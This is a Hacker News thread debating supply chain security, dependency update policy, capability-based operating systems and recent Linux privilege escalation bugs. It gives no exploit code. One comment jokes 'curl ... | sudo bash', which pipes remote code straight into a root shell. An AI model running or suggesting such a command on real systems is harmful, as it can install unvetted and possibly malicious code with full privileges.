marcus_holmes
YZF
I worked for one company where we were super conservative. Every external component was versioned. Nothing was updated without review and usually after it had plenty of soak time. Pretty much everything built from source code (compilers, kernel etc.). Builds [build servers/infra] can't reach the Internet at all and there's process around getting any change in. We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boot on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Company #1's approach is, to me, the better one in terms of dependency management. In general company #1 had well established security practices and we had really secure products.
whilenot-dev
You forgot case #4: Worked at a startup where the frontend team thought it was a good idea to use lock files during development, but to do a "fresh" install of all dependencies during the deployment step.
And yes, they still thought they were doing the right thing.
hennell
To be fair, npm makes (made?) it weirdly hard to use lock files, so a lot of people did that by mistake. And even when you do use the lock file, it reinstalls every time, so a retagged package can just silently update.
gwerbin
This is one of those bizarre "how did you even get that idea" mistakes that ironically replacing developers with AI slop farmers might actually improve on. If you ask Claude to set up a project with NPM and CI, it's not going to do weird shit like that.
KGunnerud
I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things I do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
12_throw_away
> I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.
Sorry, but if you are updating continuously, then there is at least one layer that you failed to build any security into.
bshanks
What's the conservative best practice for a solo founder (a one person company; assume the person spends ~20 hours per week on software development/maintenance and the rest of the time on other stuff)?
pseudohadamard
It's interesting how standards have changed. 25 years ago people screamed about ActiveX despite Microsoft's various attempts to lock it down. Today people use something that pulls a package from a Github repo that was abandoned eight years ago that pulls a package from an FTP server in Denmark that pulls a package from a Raspberry Pi in someone's basement in New Mexico and it's all good practice.
dataflow
> Everyone seems to think they are doing the right thing
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
KronisLV
> if they saw the risk as large enough.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
emodendroket
Really? You think the alternate mode where you're running 5-year-old versions of stuff with tons of known security flaws is better?
ndsipa_pomu
> It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
JTbane
Honestly the de facto standard is to blame: at my dev job, we vacuum up all the packages we need and get the software deployed to production ASAP, then later go over the SBOM and make sure nothing looks sketchy. I'd imagine this is the default most places; an intensive approval process would slow down CI/CD too much.
echelon_musk
Do you ride an R1?
YZF
I used to ride a 600R ... yes- that's where my handle comes from ;)
tclancy
So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
xingped
TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.
michaelchisari
I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.
Rivers caught on fire for a hundred years before the EPA was formed.
FrinkleFrankle
New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.
akoboldfrying
> we're entering a more hardened era of software
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of finding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
anankaie
To be fair, to some extent that’s up to us. Time to get cleaning, I guess.
larodi
Are you intentionally avoiding saying 'thanks to LLMs', or is it implicit? All these recent mega bugs surface with lots of fuzzing and agentic bashing, right?
jpollock
Faults are injected into the code at a constant rate per developer. Then there are the intentional injections.
Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?
rounce
This is related to a massive annoyance of mine: when I run a piece of software and the system is missing a required dependency, I want the software to *tell me* that dependency is missing so I can make a decision about proceeding or not. Instead it seems that far too often software authors will try and be “clever” by silently installing a bunch of dependencies, either in some directory path specific to the software, or even worse globally.
I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
i_think_so
Is it really a constant rate? Or is it a Law of Large Numbers kind of thing, where past a certain scale the randomness gets smoothed out and looks constant? Or something else?
(Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)
teiferer
curl ... | sudo bash
yolo!
allthetime
New software is being generated faster than it can be adequately tested. We are in the same place we’ve always been; except everything is moving much too fast.
repelsteeltje
This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments of a multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
ClikeX
I'm somehow reminded of Wile E. Coyote running off a ledge, staying afloat until he realizes there is no more ground under his feet.
bulbar
I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones, and the occasional AI fuckup instead of the occasional human fuckup.
bigiain
Yeah.
Right now it kinda feels to me like "Open Source" is the Russian army, relying on sheer numbers and a huge quantity of equipment, much of which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school, who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about it quickly enough.
marcus_holmes
This assumes that there are no new exploits being generated.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
teiferer
That is already how it works. The loner hacker in mom's basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.
mastermage
There is an xkcd about that, I think.
mahart
Having casually read into a few recent incidents the vector has often been outside of software. A lot of mis-configurations or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes, insiders, and even standing up entire companies.
dml2135
Here's a crazy idea -- what if some of these vulnerabilities are surfacing because they have actually been found, already, and exist in the training data?
Even an intelligence agency doesn't have perfect opsec, and something could get mentioned offhand somewhere on a forum, but never get picked up until the LLM uses it.
Barbing
Will need those animal bones if all the industrial control systems get turned against us
Nuclear might be airgapped but what about water, power…?
josephg
I've been wanting a capability based security model for years. Argued about it here in fact. Capabilities are kind of an object pointer with associated permissions - like a unix file descriptor.
We should have:
- OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.
- Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.
SeL4 has fast, efficient OS level capabilities. It's had them for years. They work great. They're fast - faster than linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run linux as a process in sel4. I want an OS that has all the features of my linux desktop, but works like SeL4.
Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
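A minimal sketch of what that "no ambient authority" idea could look like at the library level, in Rust. `FsCap` and its methods are invented here for illustration, not any real crate's API: the library never names paths on its own authority; it can only resolve them through a capability the caller hands it, and anything outside that subtree is rejected before a real open() could ever happen.

```rust
use std::path::{Component, Path, PathBuf};

/// A capability granting access to files under `root` only.
/// (Hypothetical type, for illustration.)
struct FsCap {
    root: PathBuf,
}

impl FsCap {
    fn new(root: impl Into<PathBuf>) -> Self {
        FsCap { root: root.into() }
    }

    /// Resolve a relative path inside the capability's subtree,
    /// rejecting anything that would escape it.
    fn resolve(&self, rel: &str) -> Result<PathBuf, String> {
        let p = Path::new(rel);
        if p.is_absolute() || p.components().any(|c| matches!(c, Component::ParentDir)) {
            return Err(format!("path {:?} escapes capability root", rel));
        }
        Ok(self.root.join(p))
    }
}

fn main() {
    // The application holds a broad capability...
    let cap = FsCap::new("/srv/app/data");
    // ...and a library only ever sees paths resolved through it.
    assert_eq!(
        cap.resolve("logs/out.txt").unwrap(),
        PathBuf::from("/srv/app/data/logs/out.txt")
    );
    // Escape attempts fail inside the capability, not at the syscall.
    assert!(cap.resolve("../../etc/passwd").is_err());
    assert!(cap.resolve("/etc/passwd").is_err());
}
```

The point is the shape of the API, not this toy check: `lib::do_work(cap, ...)` can at worst damage what `cap` reaches, which bounds the blast radius of a malicious dependency.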
If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.
mike_hearn
Capabilities have a lot of serious design problems which is why no mainstream language has them. Because this comes up so often on HN I wrote an essay explaining the issues here:
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.
The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
josephg
> I wrote an essay explaining the issues here
This essay only addresses my second point - capabilities within a program. It doesn't address OS level capabilities at all.
But even in the space of programming languages, I find this essay extremely unconvincing. Like, you raise points like this:
> Here are some problems you’ll have to solve in order to sandbox libraries: What is your threat model? How do you stop components tampering with each other’s memory?
The threat model is left pad cryptolockering your computer via a supply chain attack. The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.
You stop components tampering with each other's memory by using a memory safe language.
> its main() method must be given a “god object” exposing all the ambient authorities the app begins with
So what? The main function already takes arguments. I don't understand the problem.
Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.
Then there's these weird claims:
> Any mutable global variable is a problem as it may allow one component to violate expectations held by another.
You don't need to ban mutable global variables! Let's imagine we did this in safe rust. I think the only constraint is that a global variable can't be shared over the boundary between crates. But - nobody does that anyway. Even if you did share a global over a crate boundary, the child crate would still only be able to access it through methods on the type.
Sneaky developers could leverage globals to violate the security boundary. But it would be hard to do by accident. Maybe just, don't do that.
Your essay talks about some research project making a capability based java subset. And I understand that the resulting ergonomics weren't very good. But that isn't evidence that capabilities themselves are a bad idea. If a research student wrote a half-baked C compiler one time, you wouldn't take that as evidence that C compilers are a bad idea. I do, however, accept that the burden of proof is on me to demonstrate that it's a good idea. I hope that I can some day rise to that challenge.
> The filesystem is a trusted entity on any OS design I'm familiar with
That's not how capability based microkernels like SeL4 work. The filesystem is owned by a specialised process. Other processes only modify files by sending messages to the filesystem process via a capability handle. If nobody created a writable file handle, the file can't be arbitrarily mutated by another module. Copyfail happened because in linux, any code can by default interact with the page table. One piece of code was missing access control checks. In capability based systems, it's basically impossible to accidentally forget access control checks like that.
> The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
Copyfail is a logic bug. C#, Java or Kotlin wouldn't save you from it at all.
theamk
Note that capabilities would not help for those bugs we are discussing today.
Those exploits are in the kernel, and userspace is only making the normal, allowed calls. Replacing global open()/listen()/etc. with capability-based versions would still allow one to invoke the same kernel bugs.
(Now, using a microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent of what userspace does, you can have a POSIX layer with seL4, and (2) that would be way more context switches, so a performance drop.)
josephg
> Note that capabilities would not help for those bugs we are discussing today.
Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.
Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.
A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.
> (2) that would be may more context switches, so a performance drop
I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).
But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.
I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.
grebc
Have you heard of pledge in OpenBSD?
I prefer its model of declaring "this is what I want to use"; any calls to code outside that error out.
josephg
Yes. But its nowhere near as powerful as capabilities.
- Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.
- Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.
- You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.
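The attenuation step described above ("cap A has x, y, z; make cap B with only x") can be sketched in a few lines of Rust. `Cap` and `Right` are hypothetical names, not a real library's API: deriving a child capability takes the intersection of the requested rights with the parent's rights, so privileges can only ever be dropped, never regained.

```rust
use std::collections::HashSet;

// Hypothetical rights a capability can carry, for illustration.
#[derive(Clone, PartialEq, Eq, Hash, Debug)]
enum Right { Read, Write, Network }

#[derive(Clone)]
struct Cap {
    rights: HashSet<Right>,
}

impl Cap {
    fn allows(&self, r: &Right) -> bool {
        self.rights.contains(r)
    }

    /// Derive a child capability with only the intersection of the
    /// requested rights and this capability's own rights.
    fn restrict(&self, wanted: &[Right]) -> Cap {
        Cap {
            rights: wanted
                .iter()
                .filter(|r| self.rights.contains(*r))
                .cloned()
                .collect(),
        }
    }
}

fn main() {
    // Root capability: everything the process was launched with.
    let root = Cap {
        rights: [Right::Read, Right::Write, Right::Network].into_iter().collect(),
    };
    // Pledge-style self-restriction: keep only Read.
    let restricted = root.restrict(&[Right::Read]);
    assert!(restricted.allows(&Right::Read));
    assert!(!restricted.allows(&Right::Network));
    // Attenuation is one-way: a child cannot mint back dropped rights.
    let attempt = restricted.restrict(&[Right::Write, Right::Network]);
    assert!(!attempt.allows(&Right::Write));
}
```

Pledge then falls out as the special case where a process calls `restrict` on its own root capability; the reverse construction is what pledge can't express.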
c7b
My pet theory is that package managers will one day be seen like we see object-oriented programming today. As something that was once popular but that we've since grown out of. It's also a design flaw that I see in cargo/Rust. Having to import 3rd party packages with who-knows-what dependencies to do pretty much anything, from using async to parsing JSON, it's supply chain vulnerability baked into the language philosophy. npm is no better, but I'm mentioning Rust specifically because it's an otherwise security-conscious language.
mike_hearn
The industry hasn't grown out of OOP. Go look at any major production codebase businesses rely on and it's full of objects and classes, including new codebases made very recently.
Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).
Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
c7b
It's a condensed statement. There was a time when I would start a new programming project thinking about class hierarchies, maybe drawing some UML diagrams. I don't do that anymore, and I don't believe it's very common for greenfield projects anymore. But educate me if that's wrong. We've kept some of the good ideas from OOP like namespaces and interfaces and we use them in slightly different contexts now, where OOP may even still be technically possible, but it's not the primary way of doing things anymore. I believe, or at least hope, that we will see a similar kind of evolution for package managers. Where it's still possible to use other people's code, but having packages like left-pad or is-even is no longer how it's commonly being used, even if it may still technically be possible.
pjmlp
Rust is quite bad on this; having to rely on external crates for error handling or macros is even worse than having to pick an async runtime.
Yes, I mean crates like anyhow and syn.
kibwen
I'm all for including more things in the Rust standard library, but anyhow and syn are literally from a core Rust dev. It's not some left-pad rando, it's like a Linux user saying they don't trust the Git developer.
weregiraffe
But you can't expect the language std to supply you with every package under the sun.
c7b
I don't have an answer what the alternative is going to look like. But smarter people than me may find something. C/C++ are doing fine without package managers. Go at least has a more capable standard library than Rust. But I'm not sure if Go's import github approach is the answer.
One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.
foresto
A stdlib doesn't have to provide everything under the sun in order to be helpful here.
Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.
That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.
dguest
Most people will avoid sticking things in their mouth by default. They don't wait for the microbial cultures to come back positive to say no.
We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.
noduerme
The billions of burgers served by fast food franchises with long histories of poisoning people would argue that delicious convenience overrides the hygiene instinct.
Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.
xboxnolifes
> They don't wait for the microbial cultures to come back positive to say no.
They don't wait for the cultures to come back negative to say yes either. They just eat what they are served.
dguest
Exactly! They rely on heuristics, like the fact that they are being served in a clean public restaurant which is presumably following health code, and is staffed by people who follow standard norms on hygiene. In some countries the norm is for the kitchen to be visible so the patrons can take a peek themselves.
If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food is totally free, I think most people will think twice.
yxhuvud
Most people start out as kids that do exactly that.
1718627440
And kids do not get to decide what to buy, and which food to prefer, for exactly that reason.
oever
That means going back to disabling Javascript or only allowing widely used, well-maintained Javascript libraries.
mschuster91
> or only allowing widely used, well-maintained Javascript libraries.
That isn't a guarantee either, just last month someone compromised the Axios library.
larodi
Indeed, one year ago we floated the idea that it is better to write your own code if you can than to pull in third parties. But it was heresy at the time to consider LLMs filling the gaps.
Today I’m limiting the exposure to dependencies more than ever, and particularly for things that take few hundred lines to implement. It’s a paradigm shift, no less.
orbital-decay
This replaces supply chain trust with the trust in the LLM and the provider you're using. Even if you exclude model devs from your threat model and are running the LLM yourself, it's still an uninterpretable black box that is trained on the web data which can be and is manipulated precisely to attack LLMs during training. So this approach still needs proper supply chain security.
larodi
Well, it does need that, in particular if you use an adversarial model tuned to inject malware. Not sure it has been researched to this degree though, and no provider would tell you anyway, I guess :)
noduerme
There are a lot of libs you really can't justify implementing from scratch. Mathjs and node-mysql jump to mind. Poisoned chains build up from small dependencies, and clearly staying on top of your dependency chain should be a full time job - if anyone was willing to pay someone to do that full time.
larodi
Of course, and thank God for them. But many more look more complicated and serve more use cases than you typically actually need. Like, how much of ffmpeg do you need? Well, it depends on the project. And perhaps someone is happily tearing it down with an LLM to get precisely those parts (not me, though I enjoy doing it to LLMs and other models).
But being able to have agents implement perl5 in Rust and make it faster and more secure raises many questions about the role of open source and the consequences for security and supply chain risk.
sergeykish
Web pages are handled by browsers. A Linux desktop running code without a sandbox is reckless; it relied on verification by distro maintainers, which stops working the moment users run proprietary software.
Programming language packages are an issue only because we don't have zero trust for modules: no restrictions on opening a socket or the file system. The issue is not the count; a pure function leftPad can't hurt you.
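To make the "pure function can't hurt you" point concrete, here is a leftPad written as a pure function in Rust (a standalone sketch, not the npm package's code): it computes a string from its arguments and nothing else, so there is no filesystem or network authority to abuse and nothing to sandbox.

```rust
// A pure leftPad: output depends only on the inputs, and the
// function holds no authority to touch files, sockets, or globals.
fn left_pad(s: &str, width: usize, pad: char) -> String {
    let len = s.chars().count();
    if len >= width {
        return s.to_string();
    }
    // Prepend `width - len` copies of the pad character.
    let mut out: String = std::iter::repeat(pad).take(width - len).collect();
    out.push_str(s);
    out
}

fn main() {
    assert_eq!(left_pad("7", 3, '0'), "007");
    assert_eq!(left_pad("hello", 3, ' '), "hello");
}
```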
Animats
> The sheer mass of packages
Yes.
I just noticed that a Rust program I'm working on had acquired a plotter driver crate. A plotter driver? The program has no graphical output.
Turns out that "kdtree" has a dev dependency on a profiling library that pulls in a whole graphics system. Even in release mode, I get that, because I have debug symbols turned on, which activated dev dependencies.
Aargh.
endospore
> I have debug symbols turned on, which activated dev dependencies
Nope, that doesn't happen. A dev or build dependency is not compiled into your binary. Cargo may have downloaded the crate source according to the lockfile, but that's it; it shouldn't build anything unneeded.
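For tracing how a surprise crate gets pulled in, Cargo's own tooling is enough; a sketch, run inside the project (crate names illustrative):

```shell
# Who depends on the suspicious crate? (-i inverts the tree)
cargo tree -i plotters

# What does the graph look like with dev-dependencies excluded,
# i.e. roughly what a release build actually compiles?
cargo tree -e no-dev
```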
Animats
OK, I have to check the binary.
CriticalRegion
This is a baffling take. These exploits are local privilege escalations for Linux systems. They'll allow an attacker with a foothold in a shared environment, or with low-privilege access to a system, to affect the rest of the system. They aren't RCEs and won't let attackers access environments that they couldn't before, other than in the shared hosting scenarios. That is absolutely not how most supply chain attacks are carried out. Most supply chain attacks are performed via credential theft and social engineering. The more sophisticated ones are APT-style attacks like the SolarWinds one (carried out by organisations that would already have exploits like these) or more creative stuff like the Shai-Hulud fiasco. All of these options existed before these LPEs. If you're worried about supply chain attacks, you've been worried for longer than Mythos has been out. Not updating your software is never good security advice.
AntiUSAbah
The supply chain attack in this case would be injecting the exploit into a CI/CD system and escalating the local user who runs the npm code to root.
The proper response, from them and from you, should be to make sure there's some isolation between user space and root, like gVisor.
Phelinofist
Either my reading of your comment is wrong or you misunderstood OP's supply chain comment, I think: what they mean is that a supply chain attack that gets the exploit onto a system would be great (for the attacker) right now, because the reported vulns are unfixed pretty much everywhere.
CriticalRegion
No, you read it right. I just misunderstood the post's message as "these exploits will enable more supply chain attacks". I'll probably delete my comment since it's debating a strawman. It is absolutely right that these exploits might enable these attacks to have a larger impact. I still don't think that I agree with the message since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update.
Phelinofist
> since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update
In general I agree, but I think these two vulns are 0day-y and pretty much every major distro is affected AFAIU, so there is perhaps slightly more potential than usual
throawayonthe
yeah but i mean installing an npm package in a container is giving it low privilege access
traderj0e
Well it does say "install" new software, as in run code locally
0xbadcafebee
"Wait a week to install software" does not work. Just a few months ago a massive exploit hit the web, which was a timed attack which sat for more than a month before executing. If everyone starts waiting a week, their exploits will wait 2 weeks. Cyber criminals do not need to exploit you immediately, they just need to exploit you. (It also doesn't change a large range of vuln classes like typosquatting)
tom_alexander
I think the author was suggesting "wait a week" as a one-time wait for fixes to be written and patches distributed for these specific prematurely-disclosed vulnerabilities, not an on-going suggestion for delaying all updates. But otherwise I agree with you.
moebrowne
> If everyone starts waiting a week, their exploits will wait 2 weeks
It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.
There are lists of attacks whose exposure window was much shorter than two weeks:
https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...
gpm
I think you misunderstood the article. The proposal isn't "wait a week after software has been published before installing it". It's: for the next seven days, starting now, just don't install anything, because you probably don't have patches for these vulnerabilities, and even if you do, there are probably more scary vulnerabilities about to be discovered.
hnfong
I think it's even more specific.
From TFA:
> Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.
This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.
dingocat
You're throwing the baby out with the bathwater, though. Waiting a week still prevents a decent amount of attacks. Not every attack can evade detection for two weeks. Even if it did, security scanning tools might still detect them.
Say, hypothetically, that 20% of attacks slip through (which is still worrying): you can mitigate 80% of attacks by just waiting a week. It's a low-risk, high-reward strategy.
Nathanba
well then let's wait a month or even two months. The point of the wait period is primarily to avoid the new installation of exploits, not the execution of already installed exploits.
whazor
A popular package has more exposure. When the artefact is published, the entire world can see it, and hopefully some people check the diff between versions. But without any delay, you could be hit by exploits nobody has seen yet.
chakintosh
Yeah, Stuxnet was dormant for a year until execution.
fny
This is why cooldowns have space for patches.
cperciva
Alternatively, switch to an operating system like FreeBSD which doesn't take a YOLO approach to security. Security fixes don't just get tossed into the FreeBSD kernel without coordination; they go through the FreeBSD security team and we have binary updates (via FreeBSD Update, and via pkgbase for 15.0-RELEASE) published within a couple minutes of the patches hitting the src tree. (Roughly speaking, a few seconds for the "I've pushed the patches" message to go out on slack, 10-30 seconds for patches to be uploaded, and up to a minute for mirrors to sync).
gucci-on-fleek
I'm somewhat skeptical here, because I notified the FreeBSD security team of a vulnerability a few years ago, and I never got a response, even after a follow-up email a few weeks later. To be fair, my report was about a non-core component, and the vulnerability wouldn't be very easy to exploit, but Debian, OpenBSD, SUSE, and Gentoo all patched it within a week [0].
That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)
[0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline
stingraycharles
Linux Kernel doesn’t differentiate between security bugs and other bugs, which is the main complaint here I think. They have the same process.
So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.
landr0id
FreeBSD didn’t have userland ASLR until 2019 and, amongst other missing mitigations, still doesn’t have kASLR. It’s not a serious operating system for people who care about security. If you want FreeBSD and security, take Shawn Webb’s HardenedBSD.
kelnos
Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat. It's a speed bump, not a brick wall.
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
landr0id
>Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat.
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
abrookewood
